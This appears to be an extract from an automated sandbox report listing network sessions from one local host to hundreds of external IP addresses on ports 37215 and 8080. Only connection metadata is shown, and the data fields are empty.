                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33156192.168.2.2335984197.200.98.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33157192.168.2.2342962157.53.106.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33158192.168.2.2343076197.11.48.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33159192.168.2.2342796220.173.144.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33160192.168.2.2332824157.158.161.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33161192.168.2.2346482197.189.10.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33162192.168.2.233620441.150.44.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33163192.168.2.234858289.117.231.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33164192.168.2.234494441.201.106.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33165192.168.2.2342462157.240.158.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33166192.168.2.2337686157.93.171.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33167192.168.2.234441641.212.249.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33168192.168.2.2350122157.32.155.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33169192.168.2.2352108157.232.111.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33170192.168.2.233509041.219.232.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33171192.168.2.2359550157.31.178.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33172192.168.2.235346441.169.121.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33173192.168.2.2347848197.110.196.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33174192.168.2.234917019.111.82.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33175192.168.2.2355006197.141.168.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33176192.168.2.2348640197.166.117.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33177192.168.2.2351072197.239.76.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33178192.168.2.2356090197.165.74.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33179192.168.2.2337774197.118.17.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33180192.168.2.2333702197.231.95.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33181192.168.2.2338386197.172.200.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33182192.168.2.2357926157.92.242.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33183192.168.2.233635041.46.29.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33184192.168.2.2334692196.175.128.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33185192.168.2.233672841.133.116.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33186192.168.2.2345136197.234.154.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33187192.168.2.235485641.230.189.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33188192.168.2.235043441.79.158.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33189192.168.2.2357228157.37.1.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33190192.168.2.2358818197.32.11.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33191192.168.2.2345136157.246.255.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33192192.168.2.2358600197.127.169.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33193192.168.2.2351786157.252.219.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33194192.168.2.2337530157.231.44.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33195192.168.2.2336070182.181.171.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33196192.168.2.2358928157.73.241.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33197192.168.2.235421641.117.42.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33198192.168.2.235416867.210.216.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33199192.168.2.2349078197.23.15.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33200192.168.2.2352054197.184.45.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33201192.168.2.2339304157.218.17.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33202192.168.2.2341402205.41.127.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33203192.168.2.234420071.203.224.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33204192.168.2.233372841.182.122.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33205192.168.2.234952441.94.184.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33206192.168.2.234935641.107.85.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33207192.168.2.234527441.227.61.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33208192.168.2.2346596197.133.56.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33209192.168.2.2344974162.240.202.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33210192.168.2.2340658157.63.145.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33211192.168.2.2334728157.234.60.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33212192.168.2.236016241.221.199.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33213192.168.2.2339708157.212.139.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33214192.168.2.2353016157.14.121.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33215192.168.2.23370322.169.44.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33216192.168.2.234960641.35.162.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33217192.168.2.235517441.63.83.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33218192.168.2.2348606197.194.31.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33219192.168.2.2360640197.177.158.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33220192.168.2.2350916185.92.99.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33221192.168.2.2352766179.94.156.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33222192.168.2.2355398133.220.7.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33223192.168.2.235169253.112.172.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33224192.168.2.233715048.88.68.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33225192.168.2.2343506181.103.174.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33226192.168.2.2339656161.144.204.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33227192.168.2.233724837.200.149.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33228192.168.2.234498879.230.223.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33229192.168.2.2350262188.181.21.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33230192.168.2.2356106150.204.25.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33231192.168.2.2342860106.167.4.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33232192.168.2.235233412.45.40.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33233192.168.2.23606442.5.133.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33234192.168.2.233832237.105.169.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33235192.168.2.235350419.206.65.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33236192.168.2.235217297.232.56.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33237192.168.2.235281237.206.109.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33238192.168.2.2345904209.8.209.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33239192.168.2.2350352124.17.235.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33240192.168.2.2338674178.48.175.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33241192.168.2.234547447.187.134.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33242192.168.2.234805225.206.127.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33243192.168.2.233682275.191.111.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33244192.168.2.234719680.14.15.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33245192.168.2.233582651.119.22.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33246192.168.2.234560013.182.106.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33247192.168.2.2335800202.155.233.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33248192.168.2.2332956126.55.114.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33249192.168.2.235985873.254.58.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33250192.168.2.2338218116.248.3.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33251192.168.2.2351148167.172.231.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33252192.168.2.2338936128.180.246.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33253192.168.2.2351860174.131.126.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33254192.168.2.2336910128.7.163.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33255192.168.2.233867695.115.233.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33256192.168.2.235984451.98.157.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33257192.168.2.233845683.137.46.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33258192.168.2.2334020187.224.163.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33259192.168.2.235955837.62.107.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33260192.168.2.234053835.51.124.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33261192.168.2.2357026200.102.5.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33262192.168.2.2351004172.87.41.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33263192.168.2.234441079.193.167.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33264192.168.2.234014635.0.239.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33265192.168.2.2348422202.149.36.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33266192.168.2.233987080.183.76.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33267192.168.2.2336338199.9.142.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33268192.168.2.2347814195.195.150.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33269192.168.2.2356822115.40.161.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33270192.168.2.235218077.12.242.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33271192.168.2.2348404171.249.137.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33272192.168.2.2339504219.162.56.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33273192.168.2.23335884.10.5.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33274192.168.2.2334098181.200.1.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33275192.168.2.2343654164.35.84.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33276192.168.2.2349150158.171.77.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33277192.168.2.233337853.234.234.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33278192.168.2.2348644156.214.153.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33279192.168.2.2344174111.142.174.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33280192.168.2.233625288.35.165.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33281192.168.2.233426448.173.237.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33282192.168.2.2347622149.148.242.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33283192.168.2.2349764119.62.204.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33284192.168.2.2338424140.218.164.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33285192.168.2.2346618213.247.113.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33286192.168.2.2353422160.217.28.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33287192.168.2.23485744.135.112.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33288192.168.2.2352136125.253.191.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33289192.168.2.235009460.81.16.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33290192.168.2.2335608163.121.102.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33291192.168.2.2341986200.250.207.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33292192.168.2.2359866118.115.99.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33293192.168.2.2348446131.164.88.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33294192.168.2.235313082.108.239.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33295192.168.2.2342204171.200.62.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33296192.168.2.235044268.84.239.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33297192.168.2.2356586207.42.138.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33298192.168.2.234988234.5.169.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33299192.168.2.2352624122.7.235.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33300192.168.2.2359962220.63.190.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33301192.168.2.2341018201.8.221.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33302192.168.2.235699673.84.250.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33303192.168.2.2354696108.161.17.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33304192.168.2.235516639.205.88.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33305192.168.2.2334752152.219.248.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33306192.168.2.2336880122.72.232.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33307192.168.2.235044023.112.27.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33308192.168.2.233802488.148.11.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33309192.168.2.2346834108.114.162.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33310192.168.2.2335756198.182.5.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33311192.168.2.2342736152.67.178.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33312192.168.2.235239620.156.16.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33313192.168.2.2344460116.87.208.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33314192.168.2.2334746126.172.227.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33315192.168.2.2354922201.126.120.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33316192.168.2.234653483.167.5.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33317192.168.2.2358738222.108.187.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33318192.168.2.2337958195.42.104.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33319192.168.2.2354406132.241.165.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33320192.168.2.2335488188.18.243.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33321192.168.2.233535647.13.57.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33322192.168.2.233635687.90.20.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33323192.168.2.23386122.73.181.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33324192.168.2.235716834.156.43.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33325192.168.2.235755864.80.146.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33326192.168.2.236069823.144.214.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33327192.168.2.2336764147.22.184.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33328192.168.2.2350332155.7.179.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33329192.168.2.234717814.252.39.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33330192.168.2.2341224163.9.118.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33331192.168.2.235861452.208.35.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33332192.168.2.234734450.116.88.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33333192.168.2.2358348181.51.80.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33334192.168.2.2352348176.102.6.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33335192.168.2.233843695.173.2.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33336192.168.2.2343522175.239.242.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33337192.168.2.235046070.23.207.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33338192.168.2.2357504178.82.155.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33339192.168.2.2341980112.22.74.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33340192.168.2.2356510131.3.149.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33341192.168.2.234923271.235.5.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33342192.168.2.234974253.103.2.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33343192.168.2.2360900125.116.143.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33344192.168.2.233982471.129.218.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33345192.168.2.233604885.56.3.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33346192.168.2.2353798195.163.30.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33347192.168.2.2354362188.71.131.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33348192.168.2.235355070.124.5.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33349192.168.2.234073849.137.152.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33350192.168.2.23356945.225.227.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33351192.168.2.234389841.24.239.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33352192.168.2.2357242128.118.27.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33353192.168.2.234169859.121.202.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33354192.168.2.2336362211.83.249.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33355192.168.2.2336850139.39.144.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33356192.168.2.2354836119.233.120.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33357192.168.2.234457494.179.179.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33358192.168.2.2347108135.102.18.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33359192.168.2.2333344186.177.210.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33360192.168.2.234725089.243.152.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33361192.168.2.235013044.120.45.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33362192.168.2.2340060129.99.94.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33363192.168.2.234093678.151.125.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33364192.168.2.233992232.58.174.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33365192.168.2.2344116130.240.229.968080
                                                        TimestampBytes transferredDirectionData


